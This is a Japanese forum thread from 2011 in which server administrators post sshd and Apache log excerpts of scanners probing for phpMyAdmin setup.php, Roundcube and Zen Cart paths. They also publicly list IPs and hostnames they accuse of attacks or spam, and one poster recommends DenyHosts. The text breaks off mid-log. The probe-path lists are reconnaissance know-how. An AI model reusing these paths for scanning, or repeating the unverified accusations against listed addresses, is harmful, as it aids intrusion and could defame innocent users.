アタックNo1してきたIPを晒すスレ
212.83.42.101 WEBの常連さん。 MyAdmin myadmin mysql phpMyAdmin phpmyadmin pma webdav geeklog/bbs/fckeditor/editor その他色々なフォルダを探して手当たりしだいアクセス、sshのログインも一生懸命してくる >>2 IP毎回違うけど、うちにもphpMyAdminとかpmaとか探しに何回も来てるよ phpMyAdminは多いいね。 それ以外はロボットばっかり Feb 1 20:53:36 192 sshd[30181]: refused connect from ::ffff:221.206.130.3 (::ffff:221.206.130.3) Feb 1 21:50:22 192 sshd[30308]: refused connect from ::ffff:221.206.130.3 (::ffff:221.206.130.3) Feb 1 23:10:01 192 sshd[30585]: refused connect from ::ffff:61.163.56.24 (::ffff:61.163.56.24) Feb 1 23:50:12 192 sshd[30654]: refused connect from ::ffff:61.163.56.24 (::ffff:61.163.56.24) Feb 2 00:20:23 192 sshd[30768]: refused connect from ::ffff:60.12.11.62 (::ffff:60.12.11.62) Feb 2 01:54:23 192 sshd[30957]: refused connect from ::ffff:128.226.170.170 (::ffff:128.226.170.170) Feb 2 04:37:54 192 sshd[31317]: refused connect from ::ffff:202.205.176.115 (::ffff:202.205.176.115) SSHのポートを22から変えたら全く来なくなったけど、試しに22に戻したらまた来た。 22が開いてるところしか狙ってないのかな。 うちもphpMyAdmin関係は多い # cat /var/log/httpd/access_log | grep 110.172.52.5 | wc -l 951 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /php-my-admin/scripts/setup.php HTTP/1.1" 404 228 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:01 +0900] "GET /phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:01 +0900] "GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:04 +0900] "GET /phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:04 +0900] "GET /phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 238 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 239 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 238 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 238 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:07 +0900] "GET /phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:07 +0900] "GET /phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:09 +0900] "GET /phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:22 +0900] "GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 232 こういう奴か こいつ アタックNO1w FNAfb-09p2-253.ppp11.odn.ad.jp 91.121.243.113 >7と同じ。phpMyAdmin関係総なめ >2 sshdは、denyhostお勧め。 アタックしてきたアドレスを、自動でブロックしてくれる。 我が家の現状: % egrep ^sshd /etc/hosts.deny | wc -l 1100 apacheってリクエストがないとログ記録されないっけ ,, -――-、 | アタックチャンス !! //ヾソ)),il|,);r、. 人 /";彡`ヾド!ソツノ゙ミヾ、  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ i;彡 _ _ ミ. i ,i;;;彡 ,.,._ . :_..、ヾ/ i:yv. ´;.。.、`; ;。:、 リ ヽ`i 、 _;ノ,: i、:_,. ! `| ,__、,.r、_.bヽ. ,′ /r´.三ミD‐-;→;ソ , : -´ ̄|::::|´^, r〕!Ξ´.ノ‐- 、. /::::::::::::::::ヽノ )´、:_丿|::\:::::::`‐-、. ./ :::::::\_:::::::∧ , _.∧ ./.ヽ !:::::::ヽ:::::::::|:`, 61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /roundcubemail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again." 61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /rc/README HTTP/1.1" 404 444 "-" "Morfeus strikes again." 61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /webmail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again." 61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /roundcube/README HTTP/1.1" 404 444 "-" "Morfeus strikes again." 61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /mail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again." 61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /README HTTP/1.1" 404 444 "-" "Morfeus strikes again." phpMyAdmin以外に、こんな奴も最近来るようになった 単純にroundcubeを置いてるかどうか探してるんでしょ roundcube使ったことないから知らないけど、phpMyAdminみたいにセキュリティホールあるんじゃないの? >>14 と全く同じのが来てた 日時もほぼ同じ あとこんなのとか 67.205.111.77 (5rreo.com) Date,Time,Method,URL,Query,HTTP,Status,Size,Referer,Keyword,Agent 2011/02/04,03:15:23,GET,"/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:24,GET,"/cart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:25,GET,"/zen-cart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:25,GET,"/zencart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:26,GET,"/zen/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:27,GET,"/butik/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:27,GET,"/shop/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:28,GET,"/butik/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:28,GET,"/zcart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:29,GET,"/catalog/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:29,GET,"/shop2/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:30,GET,"/boutique/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" 2011/02/04,03:15:31,GET,"/store/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola" http://members3.jcom.home.ne.jp/rising-sun/ こちらにURLを掲載されてから、スパマーが大挙して書き込みに来るようになりました。 それまで5hot/月くらいだったので、どうやって俺のサイトを見つけたのか不思議です。 馬鹿サイトサーチャーに引っかかったんじゃねw あほかと 5分から数時間周期で、うちの掲示板を爆撃してくれてるIPの方々 125-14-198-192.rev.home.ne.jp 155.215.232.111.ap.yournet.ne.jp 173.60.112.219.ap.yournet.ne.jp 182-167-50-41f1.kyt1.eonet.ne.jp 36.76.44.61.ap.yournet.ne.jp 55.223.183.58.megaegg.ne.jp fa211-113.infoaomori.ne.jp fe219-224.infoaomori.ne.jp gd202157012064.u31.kcn-tv.ne.jp i121-115-10-40.s05.a002.ap.plala.or.jp i60-34-249-28.s05.a002.ap.plala.or.jp kd111098033213.ppp-bb.dion.ne.jp nttkyo787161.tkyo.nt.ftth.ppp.infoweb.ne.jp p1208-ipbf11matuyama.ehime.ocn.ne.jp p2176-ipbf31osakakita.osaka.ocn.ne.jp p2220-ipbf217hodogaya.kanagawa.ocn.ne.jp p4001-ipbf506okidate.aomori.ocn.ne.jp p4043-ipbfp505oomichi.oita.ocn.ne.jp p6107-ipad24osakakita.osaka.ocn.ne.jp fe219-224.infoaomori.ne.jp gd202157012064.u31.kcn-tv.ne.jp i121-115-10-40.s05.a002.ap.plala.or.jp i60-34-249-28.s05.a002.ap.plala.or.jp kd111098033213.ppp-bb.dion.ne.jp nttkyo787161.tkyo.nt.ftth.ppp.infoweb.ne.jp p1208-ipbf11matuyama.ehime.ocn.ne.jp p2176-ipbf31osakakita.osaka.ocn.ne.jp p2220-ipbf217hodogaya.kanagawa.ocn.ne.jp p4001-ipbf506okidate.aomori.ocn.ne.jp p4043-ipbfp505oomichi.oita.ocn.ne.jp p6107-ipad24osakakita.osaka.ocn.ne.jp pd9c147.aicint01.ap.so-net.ne.jp softbank126028210215.bbtec.net z130201.dynamic.ppp.asahi-net.or.jp 今日のエロPOST 110.4.130.201 111.232.215.155 112.136.113.83 113.146.93.230 113.197.189.143 114.168.207.139 114.170.128.214 114.184.9.220 118.104.172.220 118.104.179.201 118.109.143.39 118.8.38.149 118.9.220.244 119.106.141.196 119.171.129.173 119.240.104.41 121.110.118.125 121.112.239.228 121.84.232.185 121.87.9.57 121.94.255.149 122.132.10.123 122.135.162.147 123.220.39.220 124.147.111.65 124.214.165.15 124.24.204.121 124.96.171.120 124.96.52.43 125.14.198.192 125.204.241.189 125.207.20.146 126.127.166.209 126.131.28.248 126.14.122.149 150.70.75.161 180.131.90.82 180.144.58.187 180.221.227.142 180.5.197.245 182.167.80.18 182.168.195.197 183.76.79.10 202.157.12.64 202.226.208.164 202.226.214.49 211.2.66.140 216.104.15.130 216.104.15.134 216.104.15.138 216.104.15.142 218.231.172.112 219.111.124.66 219.112.60.122 219.8.100.11 220.56.10.183 221.190.78.15 221.20.34.163 222.144.50.1 222.226.145.26 58.0.105.152 58.169.234.43 58.183.5.68 58.188.233.9 60.237.4.90 60.239.223.164 60.39.34.90 61.210.188.161 61.44.54.37 61.46.27.183 61.89.161.187 61.89.165.136 上の奴へ ポスト系は、IP変えながら投げるツールが腐るほどあるから いくら晒しても無駄だと思われ。 ツール使えば月50万くらいは稼げるぞw MA NU KE HA SI N DE KU RE >>26 IP変えてくる奴もいるけど、 223.132.1.24は、9千回以上ログに出てくる p840118.tokynt01.ap.so-net.ne.jp 苦しくたって 悲しくたって jailの中なら平気なの? …スマソ 91.121.108.5 [22/Feb/2011:01:49:51 +0900] "GET /scripts/setup.php HTTP/1.1" 404 REF:- 91.121.108.5 [22/Feb/2011:01:49:51 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:- 91.121.108.5 [22/Feb/2011:01:49:52 +0900] "GET /db/scripts/setup.php HTTP/1.1" 404 REF:- 91.121.108.5 [22/Feb/2011:01:49:57 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 91.121.108.5 [22/Feb/2011:01:50:03 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 91.121.108.5 [22/Feb/2011:01:50:09 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 REF:- 91.121.108.5 [22/Feb/2011:01:50:15 +0900] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 91.121.108.5 [22/Feb/2011:01:50:21 +0900] "GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 91.121.108.5 [22/Feb/2011:01:50:27 +0900] "GET /web/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:44:30 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:- 89.149.242.190 [22/Feb/2011:02:44:31 +0900] "GET /PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:44:31 +0900] "GET /3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:44:37 +0900] "GET /PMA/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:44:43 +0900] "GET /PMA2005/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:44:52 +0900] "GET /SSLMySQLAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:44:58 +0900] "GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:04 +0900] "GET /admin/pma/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:10 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:16 +0900] "GET /bbs/data/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:22 +0900] "GET /cpadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:28 +0900] "GET /cpadmindb/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:34 +0900] "GET /cpanelmysql/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:40 +0900] "GET /cpanelphpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:46 +0900] "GET /cpanelsql/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:52 +0900] "GET /cpdbadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:58 +0900] "GET /cpphpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:04 +0900] "GET /db/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:10 +0900] "GET /dbadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:16 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:22 +0900] "GET /mysql-admin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:28 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:34 +0900] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:35 +0900] "GET /mysqlmanager/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:41 +0900] "GET /p/m/a/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:35 +0900] "GET /mysqladminconfig/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:47 +0900] "GET /pMA/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:53 +0900] "GET /php-my-admin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:59 +0900] "GET /php-myadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:05 +0900] "GET /phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:11 +0900] "GET /phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:17 +0900] "GET /phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:23 +0900] "GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:29 +0900] "GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:35 +0900] "GET /phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:41 +0900] "GET /phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:47 +0900] "GET /phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:53 +0900] "GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:59 +0900] "GET /phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:05 +0900] "GET /phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:11 +0900] "GET /phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:17 +0900] "GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:23 +0900] "GET /phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:29 +0900] "GET /phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:35 +0900] "GET /phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:39 +0900] "GET /phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:38 +0900] "GET /phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:45 +0900] "GET /phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:51 +0900] "GET /phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:57 +0900] "GET /phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:03 +0900] "GET /phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:09 +0900] "GET /phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:15 +0900] "GET /phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:21 +0900] "GET /phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:27 +0900] "GET /phpMyAdmin-2.6.1-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:33 +0900] "GET /phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:39 +0900] "GET /phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:45 +0900] "GET /phpMyAdmin-2.6.1-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:51 +0900] "GET /phpMyAdmin-2.6.1-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:57 +0900] "GET /phpMyAdmin-2.6.1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:03 +0900] "GET /phpMyAdmin-2.6.2-beta1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:09 +0900] "GET /phpMyAdmin-2.6.2-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:15 +0900] "GET /phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:21 +0900] "GET /phpMyAdmin-2.6.2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:27 +0900] "GET /phpMyAdmin-2.6.3-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:33 +0900] "GET /phpMyAdmin-2.6.3-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:39 +0900] "GET /phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:43 +0900] "GET /phpMyAdmin-2.6.4-pl2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:42 +0900] "GET /phpMyAdmin-2.6.4-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:49 +0900] "GET /phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:55 +0900] "GET /phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:01 +0900] "GET /phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:07 +0900] "GET /phpMyAdmin-2.6.4/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:13 +0900] "GET /phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:19 +0900] "GET /phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:25 +0900] "GET /phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:31 +0900] "GET /phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:37 +0900] "GET /phpMyAdmin-2.7.0/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:43 +0900] "GET /phpMyAdmin-2.8.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:49 +0900] "GET /phpMyAdmin-2.8.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:55 +0900] "GET /phpMyAdmin-2.8.0-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:01 +0900] "GET /phpMyAdmin-2.8.0.1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:07 +0900] "GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:13 +0900] "GET /phpMyAdmin-2.8.0.3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:19 +0900] "GET /phpMyAdmin-2.8.0.4/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:25 +0900] "GET /phpMyAdmin-2.8.0/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:31 +0900] "GET /phpMyAdmin-2.8.1-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:37 +0900] "GET /phpMyAdmin-2.8.1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:43 +0900] "GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:46 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:46 +0900] "GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:52 +0900] "GET /phpMyAdmin2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:58 +0900] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:04 +0900] "GET /phpmanager/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:10 +0900] "GET /phpmy-admin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:16 +0900] "GET /phpmya/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:22 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:28 +0900] "GET /phpmyadmin1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:34 +0900] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:40 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:46 +0900] "GET /pma2005/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:52 +0900] "GET /roundcube/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:58 +0900] "GET /scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:04 +0900] "GET /sl2/data/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:10 +0900] "GET /sqladmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:16 +0900] "GET /sqlmanager/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:22 +0900] "GET /sqlweb/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:28 +0900] "GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:34 +0900] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:40 +0900] "GET /web/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:46 +0900] "GET /webadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:50 +0900] "GET /webdb/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:50 +0900] "GET /websql/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:56 +0900] "GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:55:02 +0900] "GET 